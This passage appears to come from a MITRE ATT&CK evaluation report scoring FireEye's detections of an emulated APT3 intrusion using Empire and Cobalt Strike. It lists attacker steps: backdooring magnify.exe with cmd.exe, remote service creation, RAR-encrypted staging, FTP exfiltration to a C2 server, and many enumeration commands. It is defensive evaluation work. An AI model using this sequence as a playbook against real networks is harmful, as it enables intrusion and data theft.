The capability enriched a logon attempt via net1.exe using valid credentials for user Kmitnick with an alert for Net Use Command Execution (Weak Signal). The password for the user Kmitnick was redacted by the capability. The vendor indicated the un-redacted passwords could be observed in triage/acquistion data.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker mounted the C$ drive on creeper with the kmitnick account. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net1.exe logon attempt by Kmitnick with Net Use Command Execution alert
Excerpt from the Managed Defense Report indicating the attacker mounting the C$ on creeper with the kmitnick account (Specific Behavior)
16.E.1
Empire: Built-in upload module executed to write malicious VBScript (autoupdate.vbs) to disk on CodeRed (10.0.1.5)
Remote File Copy
(T1105)
Enrichment
  
The capability enriched powershell.exe writing autoupdate.vbs with an alert for PowerShell File Write (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactics (Command and Control, Lateral Movement).
Enrichment of powershell.exe writing autoupdate.vbs with PowerShell File Write alert (tagged with correct ATT&CK Technique, T1105 - Remote File Copy) and Tactics, Command and Control and Lateral Movement)
Additional details on enrichment of powershell.exe writing autoupdate.vbs with PowerShell File Write alert
16.F.1
Empire: Built-in runas module executed to launch malicious VBScript (autoupdate.vbs) as user Kmitnick
Command-Line Interface
(T1059)
Enrichment
  
The capability enriched cmd.exe spawning wscript.exe with an alert for Wscript Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1059 - Command-Line Interface) and Tactic (Execution). Alert details showed that the context of the user was changed to Kmitnick.
Telemetry
  
Telemetry showed cmd.exe executing autoupdate.vbs with a parent process of powershell.exe.
Enrichment of cmd.exe spawning wscript.exe with Wscript Execution alert (tagged with correct ATT&CK Technique, T1059 - Command-Line Interface, and Tactic, Execution)
Telemetry showing cmd.exe executing autoupdate.vbs
16.G.1
Empire: Built-in move capability executed to write malicious VBScript (update.vbs) to disk on Creeper (10.0.0.4)
Remote File Copy
(T1105)
Enrichment
  
The capability enriched powershell.exe writing update.vbs with an alert for File Write to Network Share (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactic (Lateral Movement).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified the autoupdate.vbs script being written to Creeper. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of powershell.exe writing update.vbs with File Write to Network Share alert
Excerpt from the Managed Defense Report of the write of the autoupdate.vbs script (Specific Behavior)
16.H.1
Empire: 'sc query' via PowerShell to remotely enumerate services on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Enrichment
  
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). All five of the sc.exe events are rolled under the same SC Execution alert.
Enrichment of sc.exe with an alert for SC Execution (Weak Signal) (tagged with the correct ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Additional details on enrichment of sc.exe with SC Execution alert
16.I.1
Empire: 'sc create' via PowerShell to remotely create a service on Creeper (10.0.0.4)
New Service
(T1050)
Enrichment
  
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1050 - New Service) and Tactic (Persistence).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it observed the sc.exe command creating a new service called adobeupdater on Creeper from CodeRed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. All five of the sc.exe events are rolled under the same SC Execution alert.
Enrichment of sc.exe with an alert for SC Execution (Weak Signal) (tagged with correct ATT&CK Technique, T1050 - New Service, and Tactic, Discovery)
Additional details on enrichment of sc.exe with SC Execution alert
Excerpt from the Managed Defense Report indicating sc.exe was used to create a new service (Specific Behavior)
Masquerading
(T1036)
Enrichment
  
The capability enriched the sc.exe command with an alert for SC Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1007 - System Service Discovery) and the correct Tactic (Discovery). All five of the sc.exe events are rolled under the same SC Execution alert.
Enrichment of sc.exe with an alert for SC Execution (Weak Signal) (tagged with related correct ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Additional details on enrichment of sc.exe with SC Execution alert
16.J.1
Empire: 'sc qc' via PowerShell to remotely enumerate a specific service on Creeper (10.0.0.4)
System Service Discovery
(T1007)
Enrichment
  
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery). All five of the sc.exe events are rolled under the same SC Execution alert.
Enrichment of sc.exe with an alert for SC Execution (Weak Signal) (tagged with the correct ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Additional details on enrichment of sc.exe with SC Execution alert
16.K.1
Empire: 'type' via PowerShell to remotely enumerate a specific file (update.vbs) on Creeper (10.0.0.4)
File and Directory Discovery
(T1083)
None
  
No detection capability identified for this procedure.
16.L.1
Empire: 'sc start' via PowerShell to remotely launch a specific service on Creeper (10.0.0.4)
Service Execution
(T1035)
Enrichment
  
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it observed the sc.exe command starting the adobeupdater service on Creeper. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. All five of the sc.exe events are rolled under the same SC Execution alert.
Enrichment of sc.exe with an alert for SC Execution (tagged with related ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report showing sc.exe starting the adobeupdater service (Specific Behavior)
17.A.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key associated with terminal services
System Service Discovery
(T1007)
Telemetry (Tainted)
  
 
Telemetry showed reg.exe executing with command-line arguments to check if terminal services are enabled. The telemetry was tainted by the parent Reg Execution (Weak Signal) alert.
Telemetry showing reg.exe executing with command-line arguments (tainted by parent Reg Execution alert)
Query Registry
(T1012)
Enrichment
  
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery).
Enrichment of reg.exe with Reg Execution alert (tagged with correct ATT&CK Technique, T1012 - Query Registry, and Tactic, Discovery)
17.B.1
Empire: 'takeown' via PowerShell to obtain ownership of magnify.exe
File Permissions Modification
(T1222)
Enrichment
  
The capability enriched takeown.exe with an alert for Takeown Execution. The alert described how takeown can be used to change file ownership.
Enrichment of takeown.exe with Takeown Execution alert
17.B.2
Empire: 'icacls' via PowerShell to modify the DACL for magnify.exe
File Permissions Modification
(T1222)
Enrichment
  
The capability enriched icacls.exe with an alert for Icacls Execution. The alert described how icacls can be used to display or change Windows file ACLs.
Enrichment of icacls.exe with Icacls Execution alert
17.C.1
Empire: 'copy' via PowerShell to overwrite magnify.exe with cmd.exe
Accessibility Features
(T1015)
Specific Behavior
  
A Specific Behavior alert was generated for Suspicious Accessibility Features Replacement (BACKDOOR) based on magnifer.exe being overwritten. The alert was also tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactic (Persistence).
Specific Behavior
  
A Specific Behavior alert was also generated for Accessibility Features File Write (Weak Signal) based on magnifier.exe being overwritten. The alert was also tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactic (Persistence).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified magnifer.exe being overwritten with cmd.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Specific Behavior alert on overwrite of magnify.exe for Suspicious Accessibility Features Replacement (BACKDOOR) (tagged with correct ATT&CK Technique, T1015 - Accessibility Features, and Tactic, Persistence)
Specific Behavior alert on overwrite of the magnify.exe for Accessibility Feature File Write (tagged with correct ATT&CK Technique, T1015 - Accessibility Features, and Tactic, Persistence)
Excerpt from the Managed Defense Report indicating the attacker overwrote magnifier.exe (Specific Behavior)
18.A.1
Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
  
No detection capability demonstrated for this procedure.
18.B.1
Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)
Data Staged
(T1074)
Telemetry (Tainted)
  
 
Telemetry showed the creation of the .vsdx file in the Recycle Bin. The telemetry was tainted by the parent PowerShell File Write alert.
Specific Behavior
  
A Specific Behavior alert was generated on the file write of the .vsdx named File Write To Root Of Recycle Bin (Weak Signal). The alert details explained how all legitimate files should be written to a subfolder of the recycle bin, and not to the root.
Telemetry showing powershell.exe file write of .vsdx to the Recycle Bin with PowerShell File Write alert
Additional telemetry showing file write of .vsdx with PowerShell File Write alert
Specific Behavior alert for File Write to Root of Recycle Bin
Data from Network Shared Drive
(T1039)
None
  
No detection capability demonstrated for this procedure.
19.A.1
Empire: File dropped to disk is a renamed copy of the WinRAR binary
Masquerading
(T1036)
Telemetry (Tainted)
  
 
Telemetry showed the MD5 hash value of recycler.exe when it was written to disk, which an analyst could use to determine recycler.exe was actually WinRAR. The telemetry was tainted by the parent PowerShell File Write alert.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified the attacker placing the WinRAR utility on the system as recycler.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing MD5 hash of recycler.exe
Parent alert for PowerShell File Write showing tainting of recycler.exe telemetry
Excerpt from the Managed Defense Report of the attacker placing the WinRAR utility on the system as recycler.exe (Specific Behavior)
Remote File Copy
(T1105)
Enrichment
  
The capability enriched powershell.exe writing recycler.exe with an alert for PowerShell File Write (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactics (Command and Control, Lateral Movement).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it indicated the attacker placed recycler.exe on the system. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of powershell.exe writing recycler.exe with PowerShell File Write alert (tagged with correct ATT&CK Technique, T1105 - Remote File Copy and Tactics, Command and Control, Lateral Movement)
Continued enrichment of powershell.exe writing recycler.exe with PowerShell File Write alert
Excerpt from the Managed Defense Report indicating the attacker placed recycler.exe on the system (Specific Behavior)
19.B.1
Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Data Compressed
(T1002)
General Behavior
  
A General Behavior alert was generated for Execution from Suspicious Directory (Weak Signal). The alert detected processes running from uncommon locations, and included recycler.exe executing with full command-line arguments, including the use of the -hp flag to encrypt and compress data.
Enrichment
  
The capability enriched the command line output containing -hp with an alert for Possible Encrypted RAR Archive Command (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1002 - Data Compressed).
Enrichment
  
The capability enriched the file write of RAR with an alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with the correct ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration).
General Behavior
  
A General Behavior alert called File Write To Root Of Recycle Bin (Weak Signal) was generated for old.rar being written to the root of the Recycle Bin. The alerted noted that all legitimate files should be written to a subfolder of the Recycle Bin.
Enrichment
  
The capability enriched the file write of RAR with a second alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with the correct ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it indicated the attacker executed recycler.exe to create an encrypted RAR file old.rar. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
General Behavior alert for Execution from Suspicious Directory
Enrichment of -hp command line with Possible Encrypted RAR Archive Command alert (tagged with correct ATT&CK Technique, T1002 - Data Compressed)
Enrichment of RAR file write with RAR Archive Created alert (tagged with correct ATT&CK Technique, T1002 - Data Compressed, and Tactic, Exfiltration)
General Behavior alert for File Write To Root Of Recycle Bin
Enrichment of RAR file write with RAR Archive Created alert (tagged with correct ATT&CK Technique, T1002 - Data Compressed, and Tactic, Exfiltration)
Excerpt from the Managed Defense Report indicating the attacker executed recycler.exe to create an encrypted RAR file (Specific Behavior)
Data Encrypted
(T1022)
General Behavior
  
A General Behavior alert was generated for Execution from Suspicious Directory (Weak Signal). The alert detected processes running from uncommon locations, and included recycler.exe executing with full command-line arguments, including the use of the -hp flag to encrypt and compress data.
Enrichment
  
The capability enriched an alert for Possible Encrypted RAR Archive Command (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1022 - Data Encrypted).
Enrichment
  
The capability enriched the file write of RAR with an alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration).
General Behavior
  
A General Behavior alert called File Write To Root Of Recycle Bin (Weak Signal) was generated for old.rar being written to the root of the Recycle Bin. The alerted noted that all legitimate files should be written to a subfolder of the Recycle Bin.
Enrichment
  
The capability enriched recycler.exe writing old.rar to the root of the Recycle Bin with an alert for Rar Archive Created (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it observed recycler.exe creating an encrypted RAR archive. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
General Behavior alert for Execution from Suspicious Directory
Enrichment of -hp command line with Possible Encrypted RAR Archive Command alert (tagged with correct ATT&CK Technique, T1022 - Data Encrypted)
Enrichment of RAR file write with RAR Archive Created alert (tagged with a related ATT&CK Technique, T1002 - Data Compressed, and Tactic, Exfiltration)
General Behavior alert for File Write To Root Of Recycle Bin
Enrichment of RAR file write with RAR Archive Created alert (tagged with a related ATT&CK Technique, T1002 - Data Compressed, and Tactic, Exfiltration)
Excerpt from the Managed Defense Report indicating the attacker executed recycler.exe to create an encrypted RAR file (Specific Behavior)
Masquerading
(T1036)
General Behavior
  
A General Behavior alert was generated for Execution from Suspicious Directory (Weak Signal). The alert detected processes running from uncommon locations, and included recycler.exe executing with full command-line arguments, including the use of the -hp flag to encrypt and compress data.
Enrichment
  
The capability enriched an alert for Possible Encrypted RAR Archive Command (Weak Signal). The alert was also tagged with related ATT&CK Techniques (T1022 - Data Encrypted and T1002 - Data Compressed).
Enrichment
  
The capability enriched the file write of RAR with an alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration).
General Behavior
  
A General Behavior alert called File Write To Root Of Recycle Bin (Weak Signal) was generated for old.rar being written to the root of the Recycle Bin. The alerted noted that all legitimate files should be written to a subfolder of the Recycle Bin.
Enrichment
  
The capability enriched recycler.exe writing old.rar to the root of the Recycle Bin with an alert for Rar Archive Created (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it observed recycler.exe creating an encrypted RAR archive. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
General Behavior alert for Execution from Suspicious Directory
Enrichment of -hp command line with Possible Encrypted RAR Archive Command alert (tagged with related ATT&CK Techniques, T1022 - Data Encrypted and T1002 - Data Compressed)
Enrichment of RAR file write with RAR Archive Created alert (tagged with a related ATT&CK Technique, T1002 - Data Compressed, and Tactic, Exfiltration)
General Behavior alert for File Write To Root Of Recycle Bin
Enrichment of RAR file write with RAR Archive Created alert (tagged with a related ATT&CK Technique, T1002 - Data Compressed, and Tactic, Exfiltration)
Excerpt from the Managed Defense Report indicating the attacker executed recycler.exe to create an encrypted RAR file (Specific Behavior)
19.C.1
Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel
Exfiltration Over Alternative Protocol
(T1048)
Enrichment
  
The capability enriched ftp.exe execution with an alert for FTP Utility Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Software (T0095 - FTP).
Enrichment
  
The capability enriched ftp.exe with the -s argument with a separate alert for FTP Utility Execution (Weak Signal).
Enrichment
  
The capability enriched a TCP port 21 connection to 192.168.0.4 (C2 server) with an alert for FTP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1048 - Exfiltration Over Alternative Protocol) and Tactic (Exfiltration).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it observed the ftp commands being written to ftp.txt and the subsequent execution of ftp.exe with the file. The old.rar file was seen uploaded to 192.168.0.4 (C2 server). Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of ftp.exe executing the ftp.txt file with FTP Utility Execution alert (tagged with the correct ATT&CK Software, S0095 - FTP)
Enrichment of ftp.exe executing ftp.exe based on the use of the -s argument with FTP Utility Execution alert
Enrichment of TCP port 21 connection to 192.168.0.4 (C2 server) (tagged with correct ATT&CK Technique, T1048 - Exfiltration Over Alternative Protocol and, Tactic, Exfiltration)
Excerpt from the Managed Defense Report showing the writing of FTP command to ftp.txt and the subsequent execution of the ftp.txt file (Specific Behavior)
19.D.1
Empire: 'del C:\"$"Recycle.bin\old.rar'
File Deletion
(T1107)
None
  
No detection capability demonstrated for this procedure.
19.D.2
Empire: 'del recycler.exe'
File Deletion
(T1107)
None
  
No detection capability demonstrated for this procedure.
20.A.1
magnifer.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
Accessibility Features
(T1015)
General Behavior
  
A General Behavior alert was generated for RENAMED CMD.EXE, with a description explaining how attackers will sometimes rename cmd.exe to other filenames to try to bypass detections.
Specific Behavior
  
A Specific Behavior alert was generated for Accessibility Features Child Process due to whoami.exe spawning from magnify.exe. The alert was also tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactics (Persistence, Privilege Escalation).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker replaced the magnifier.exe accessibility feature to launch a privileged command shell. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
General Behavior alert for RENAMED CMD.EXE
Continued details for General Behavior alert for RENAMED CMD.EXE
Specific Behavior alert for Accessibility Features Child Process due to magnify.exe spawning whoami.exe (tagged with the correct ATT&CK Technique, T1015 - Accessibility Features, and Tactics, Persistence, Privilege Escalation)
Excerpt from the Managed Defense Report indicating the attacker replaced the magnifier.exe accessibility feature to launch a privileged command shell (Specific Behavior)
Remote Desktop Protocol
(T1076)
Enrichment
  
The capability enriched a TCP port 3389 connection with an alert for RDP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1076 - Remote Desktop Protocol) and Tactic (Lateral Movement).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified the use of the Remote Desktop Protocol to connect to Creeper. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of TCP port 3389 connection with RDP Network Connection alert (tagged with correct ATT&CK Technique T10176 - Remote Desktop Protocol, and Tactic, Lateral Movement)
Excerpt from the Managed Defense Report indicating Remote Desktop Protocol was used to connect to Creeper (Specific Behavior)
20.B.1
Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed whoami.exe executing from magnify.exe within an alert for Accessibility Features Child Process. The telemetry was tainted by the Accessibility Features Child Process (METHODOLOGY) alert.
Enrichment
  
The capability enriched whoami.exe with an alert for Whoami Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1033 - System Owner/User Discovery) and Tactic (Discovery).
Telemetry showing whoami.exe executing as a child process of magnify.exe (tainted by parent Accessibility Features Child Process alert)
Enrichment of whoami.exe with Whoami Execution alert (tagged with correct ATT&CK Technique, T1033 - System Owner/User Discovery, and Tactic, Discovery)







Operational Flow The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

Step 1: Initial Compromise

1.A.1 Execution

User Execution, Rundll32, Scripting

i. Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

1.B.1 Persistence

Registry Run Keys / Startup Folder

i. Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

1.C.1 Command and Control

Commonly Used Port, Data Encoding, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel established

Step 2: Initial Discover

2.A.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'ipconfig /all' via cmd

2.A.2 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'arp -a' via cmd

2.B.1 Discovery

System Owner / User Discovery

i. Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

2.C.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

2.C.2 Discovery

Process Discovery

i. Cobalt Strike: 'tasklist /v' via cmd

2.D.1 Discovery

System Service Discovery

i. Cobalt Strike: 'sc query' via cmd

2.D.2 Discovery

System Service Discovery

i. Cobalt Strike: 'net start' via cmd

2.E.1 Discovery

System Information Discovery

i. Cobalt Strike: 'systeminfo' via cmd

2.E.2 Discovery

System Information Discovery

i. Cobalt Strike: 'net config workstation' via cmd

2.F.1 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators' via cmd

2.F.2 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators /domain' via cmd

2.F.3 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net group "Domain Admins" /domain' via cmd

2.G.1 Discovery

Account Discovery

i. Cobalt Strike: 'net user /domain' via cmd

2.G.2 Discovery

Account Discovery

i. Cobalt Strike: 'net user george /domain' via cmd

2.H.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Step 3: Privilege Escalation

3.A.1 Defense Evasion, Privilege Escalation

Access Token Manipulation, Bypass User Account Control

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

3.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

3.C.1 Defense Evasion, Privilege Escalation

Process Injection

i. Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Step 4: Discovery for Lateral Movement

4.A.1 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd

4.A.2 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Computers" /domain' via cmd

4.B.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

4.C.1 Discovery

System Network Connections Discovery

i. Cobalt Strike: 'netstat -ano' via cmd

Step 5: Credential Access

5.A.1 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in Mimikatz credential dump capability executed

5.A.2 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in hash dump capability executed

5.B.1 Defense Evasion, Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in token theft capability executed to change user context to George

Step 6: Lateral Movement

6.A.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

6.B.1 Command and Control

Commonly Used Port, Multiband Communication, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel modified

6.C.1 Lateral Movement

Remote Desktop Protocol

i. Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Step 7: Persistence

7.A.1 Persistence

Create Account, Graphical User Interface, Account Discovery

i. Added user Jesse to Conficker (10.0.0.5) through RDP connection

7.B.1 Command and Control, Lateral Movement

Remote File Copy

i. Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

7.C.1 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Step 8: Collection

8.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd

8.A.2 Discovery

File and Directory Discovery

i. Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

8.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

8.C.1 Collection, Credential Access

Input Capture, Application Window Discovery

i. Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

8.D.1 Collection

Screen Capture, Process Injection

i. Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

Step 9: Exfiltration

9.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Collection

Data from Network Shared Drive, Exfiltration Over Command and Control Channel

i. Cobalt Strike: Built-in download capability executed to a collect file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 10: Execution of Persistence

10.A.1 Persistence

Registry Run Keys / Startup Folder

i. Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

10.A.2 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

10.B.1 Lateral Movement

Remote Desktop Protocol, Valid Accounts

i. RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

Step 11: Initial Access

11.A.1 Defense Evasion, Execution

Scripting

i. Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

11.B.1 Command and Control

Commonly Used Port, Standard Application Layer Protocol, Standard Cryptographic Protocol

i. Empire: C2 channel established

Step 12: Initial Discover

12.A.1 Discovery

System Network Configuration Discovery

i. Empire: 'route print' via PowerShell

12.A.2 Discovery

System Network Configuration Discovery

i. Empire: 'ipconfig /all' via PowerShell

12.B.1 Discovery

System Owner / User Discovery

i. Empire: 'whoami /all /fo list' via PowerShell

12.C.1 Discovery

Process Discovery

i. Empire: 'qprocess *' via PowerShell

12.D.1 Discovery

System Service Discovery

i. Empire: 'net start' via PowerShell

12.E.1 Defense Evasion, Execution

Scripting

i. Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques

12.E.1.1 Discovery

System Owner / User Discovery

i. Empire: WinEnum module included enumeration of user information

12.E.1.2 Discovery

Permission Groups Discovery

i. Empire: WinEnum module included enumeration of AD group memberships

12.E.1.3 Discovery

Password Policy Discovery

i. Empire: WinEnum module included enumeration of password policy information

12.E.1.4.1 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of recently opened files

12.E.1.4.2 Discovery

File and Directory Discovery

i. Empire: WinEnum module included enumeration of interesting files

12.E.1.5 Collection

Clipboard Data

i. Empire: WinEnum module included enumeration of clipboard contents

12.E.1.6.1 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of system information

12.E.1.6.2 Discovery

System Information Discovery

i. Empire: WinEnum module included enumeration of Windows update information

12.E.1.7 Discovery

Query Registry

i. Empire: WinEnum module included enumeration of system information via a Registry query

12.E.1.8 Discovery

System Service Discovery

i. Empire: WinEnum module included enumeration of services

12.E.1.9.1 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of available shares

12.E.1.9.2 Discovery

Network Share Discovery

i. Empire: WinEnum module included enumeration of mapped network drives

12.E.1.10.1 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of AV solutions

12.E.1.10.2 Discovery

Security Software Discovery

i. Empire: WinEnum module included enumeration of firewall rules

12.E.1.11 Discovery

System Network Configuration Discovery

i. Empire: WinEnum module included enumeration of network adapters

12.E.1.12 Discovery

System Network Connections Discovery

i. Empire: WinEnum module included enumeration of established network connections

12.F.1 Discovery

Permission Groups Discovery

i. Empire: 'net group "Domain Admins" /domain' via PowerShell

12.F.2 Discovery

Permission Groups Discovery

i. Empire: 'net localgroup administrators' via PowerShell

12.G.1 Discovery

Account Discovery

i. Empire: 'net user' via PowerShell

12.G.2 Discovery

Account Discovery

i. Empire: 'net user /domain' via PowerShell

Step 13: Discovery for Lateral Movement

13.A.1 Discovery

Remote System Discovery

i. Empire: 'net group "Domain Computers" /domain' via PowerShell

13.B.1 Discovery

System Network Connections Discovery

i. Empire: 'net use' via PowerShell

13.B.2 Discovery

System Network Connections Discovery

i. Empire: 'netstat -ano' via PowerShell

13.C.1 Discovery

Query Registry

i. Empire: 'reg query' via PowerShell to enumerate a specific Registry key

Step 14: Privilege Escalation

14.A.1 Defense Evasion, Privilege Escalation

